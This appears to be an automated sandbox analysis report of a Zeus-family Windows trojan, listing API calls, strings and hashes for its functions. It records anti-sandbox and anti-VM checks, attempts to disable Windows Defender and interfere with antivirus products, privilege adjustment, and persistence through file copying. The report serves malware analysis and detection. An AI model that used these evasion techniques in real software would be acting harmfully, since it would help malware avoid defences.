                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2141769100.0000000000F30000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2141687377.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true


                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:1.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:64%
                                                                                                                                                                                                              Total number of Nodes:253
                                                                                                                                                                                                              Total number of Limit Nodes:16
30653->30656 30655 401282 IsBadWritePtr 30654->30655 30657 401291 30654->30657 30655->30657 30658 40124a 30656->30658 30659 4011a7 GetProcessHeap RtlAllocateHeap 30656->30659 30657->30612 30657->30613 30658->30654 30662 40125f GetHandleInformation 30658->30662 30660 4011d5 30659->30660 30661 4011c6 memset 30659->30661 30660->30658 30663 4011dc SetFilePointer LockFile ReadFile UnlockFile 30660->30663 30661->30660 30662->30654 30664 40126e 30662->30664 30663->30658 30666 401228 GetProcessHeap HeapValidate 30663->30666 30664->30654 30665 401274 CloseHandle 30664->30665 30665->30654 30666->30658 30667 40123e GetProcessHeap HeapFree 30666->30667 30667->30658 30669 401c12 GetFileTime 30668->30669 30670 401ca5 MoveFileExA GetModuleHandleA 30668->30670 30671 401c30 GetHandleInformation 30669->30671 30672 401c4c CreateFileA 30669->30672 30670->30619 30670->30620 30671->30672 30673 401c3f 30671->30673 30672->30670 30674 401c6b SetFileTime 30672->30674 30673->30672 30675 401c45 CloseHandle 30673->30675 30674->30670 30676 401c89 GetHandleInformation 30674->30676 30675->30672 30676->30670 30677 401c98 30676->30677 30677->30670 30678 401c9e CloseHandle 30677->30678 30678->30670 30680 401533 30679->30680 30681 40158f 30679->30681 30682 401545 GetHandleInformation 30680->30682 30683 40155d 30680->30683 30681->30622 30682->30683 30684 401550 30682->30684 30685 401581 30683->30685 30686 401569 GetHandleInformation 30683->30686 30684->30683 30687 401556 CloseHandle 30684->30687 30685->30622 30686->30685 30688 401574 30686->30688 30687->30683 30688->30685 30689 40157a CloseHandle 30688->30689 30689->30685 30690->30609 30691->30604

Control-flow Graph (function 00402D30)
APIs
• LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
  • Part of subcall function 00403A20: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
  • Part of subcall function 00403A20: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
  • Part of subcall function 00403A20: RegCloseKey.ADVAPI32(?), ref: 00403A93
  • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
  • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
  • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
  • Part of subcall function 00403A20: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
  • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
• ExitProcess.KERNEL32 ref: 00402D66
• FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
• GetTickCount.KERNEL32 ref: 00402D89
• PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
• IsUserAnAdmin.SHELL32 ref: 00402DBB
• ExitProcess.KERNEL32 ref: 00402DCC
Strings
Memory Dump Source
• Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
Yara matches
Similarity
• API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
• String ID: IsWow64Process$Pnfw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe

Control-flow Graph (function 00403A20)
APIs
• RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
• RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
• RegCloseKey.ADVAPI32(?), ref: 00403A93
• RegCloseKey.ADVAPI32(?), ref: 00403A9F
• GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
• CharUpperA.USER32(?), ref: 00403AE6
• strstr.MSVCRT ref: 00403AFE
• strstr.MSVCRT ref: 00403B17
• strstr.MSVCRT ref: 00403B30
• GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
• GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
• StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
• StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
• StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
Strings
Memory Dump Source
• Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
Yara matches
Similarity
• API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
• String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\

Control-flow Graph (function 004021D0)
APIs
• CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
• DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
• CloseHandle.KERNEL32(00000000), ref: 0040234A
Strings
Memory Dump Source
• Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
Yara matches
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                              • API String ID: 33631002-3172865025
                                                                                                                                                                                                              • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 151 401150-401160 152 401166-401182 CreateFileA 151->152 153 40127b-401280 151->153 152->153 156 401188-4011a1 GetFileSizeEx 152->156 154 401282-40128f IsBadWritePtr 153->154 155 40129f 153->155 157 4012a1-4012a7 154->157 158 401291-40129c 154->158 155->157 159 401254-40125d 156->159 160 4011a7-4011c4 GetProcessHeap RtlAllocateHeap 156->160 159->153 163 40125f-40126c GetHandleInformation 159->163 161 4011d5-4011da 160->161 162 4011c6-4011d2 memset 160->162 161->159 164 4011dc-401226 SetFilePointer LockFile ReadFile UnlockFile 161->164 162->161 163->153 165 40126e-401272 163->165 167 401251 164->167 168 401228-40123c GetProcessHeap HeapValidate 164->168 165->153 166 401274-401275 CloseHandle 165->166 166->153 167->159 169 40124a 168->169 170 40123e-401244 GetProcessHeap HeapFree 168->170 169->167 170->169
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401285
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$Handle$AllocateCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID: G,@
                                                                                                                                                                                                              • API String ID: 2214028410-3313068137
                                                                                                                                                                                                              • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 272 401b20-401b35 273 401bd7-401bdd 272->273 274 401b3b-401b48 call 401150 272->274 274->273 277 401b4e-401b59 RtlImageNtHeader 274->277 278 401bb5-401bc9 GetProcessHeap HeapValidate 277->278 279 401b5b-401b7c GetTickCount GetModuleHandleA 277->279 278->273 280 401bcb-401bd1 GetProcessHeap HeapFree 278->280 281 401b95-401bb0 EntryPoint 279->281 282 401b7e-401b8c GetProcAddress 279->282 280->273 281->278 282->281 283 401b8e 282->283 283->281
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401150: CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • Part of subcall function 00401150: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • Part of subcall function 00401150: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • Part of subcall function 00401150: ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                              • EntryPoint.Z8EHWAVQAH(00000000), ref: 00401BB0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateEntryHandleHeaderImageLockModulePointPointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 193611197-905597979
                                                                                                                                                                                                              • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 284 4020e0-40213c memset SHGetFolderPathA 285 4021a7-4021a9 284->285 286 40213e-40215f PathAppendA SetCurrentDirectoryA 284->286 287 4021b2-4021c2 285->287 288 4021ab-4021ac FreeLibrary 285->288 286->285 289 402161-402173 LoadLibraryA 286->289 288->287 289->285 290 402175-402183 GetProcAddress 289->290 290->285 291 402185-402192 290->291 291->285
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402157
                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402166
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                              • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                              • API String ID: 1010965793-1794910726
                                                                                                                                                                                                              • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 293 402680-4026ac CoInitializeEx 294 4026ae-4026b1 293->294 295 4026bf-4026e7 GetModuleFileNameW SysAllocString 293->295 294->295 296 4026b3-4026b9 294->296 297 402869-40286f 295->297 298 4026ed-4026f8 SysAllocString 295->298 296->295 299 4028c4-4028c9 296->299 300 402871-402876 297->300 301 402879-40287e 297->301 302 402853-402861 SysFreeString 298->302 303 4026fe-40271f CoCreateInstance 298->303 300->301 306 402880-402885 301->306 307 402888-40288d 301->307 304 402863-402864 SysFreeString 302->304 305 402866 302->305 308 402725-40272a 303->308 309 402827-40282a 303->309 304->305 305->297 306->307 311 402897-40289c 307->311 312 40288f-402894 307->312 308->309 310 402730-402741 308->310 309->302 310->302 318 402747-402758 310->318 313 4028a6-4028ab 311->313 314 40289e-4028a3 311->314 312->311 316 4028b5-4028b7 313->316 317 4028ad-4028b2 313->317 314->313 319 4028b9-4028bc 316->319 320 4028be CoUninitialize 316->320 317->316 318->302 322 40275e-402768 318->322 319->299 319->320 320->299 323 40276d-40276f 322->323 323->302 324 402775-40277c 323->324 325 402851 324->325 326 402782-402793 324->326 325->302 326->325 328 402799-4027b1 326->328 330 4027b3-4027d3 CoCreateInstance 328->330 331 40282c-40283d 328->331 332 4027d5-4027da 330->332 333 4027dc 330->333 331->325 337 40283f-402843 331->337 332->333 334 4027de-4027e3 332->334 333->334 334->325 336 4027e5-4027f0 334->336 336->325 340 4027f2-402803 336->340 337->325 338 402845-40284e 337->338 338->325 340->325 342 402805-402814 340->342 342->325 344 402816-402825 342->344 344->325
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                              • CoUninitialize.COMBASE ref: 004028BE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                              • String ID: Windows Explorer
                                                                                                                                                                                                              • API String ID: 1140695583-228612681
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 731831024-2333288578
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                              • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                              • API String ID: 3225117150-898603304

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,75C8DB30), ref: 00402AAB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNELBASE(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                              • PathFileExistsA.KERNELBASE(?), ref: 00402AE4
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                              • EntryPoint.Z8EHWAVQAH(00000000), ref: 00402C76
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryEntryExistsExitFindFreeHeaderImageMoveNamePathPointQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                              • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                              • API String ID: 450058505-3112416296

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
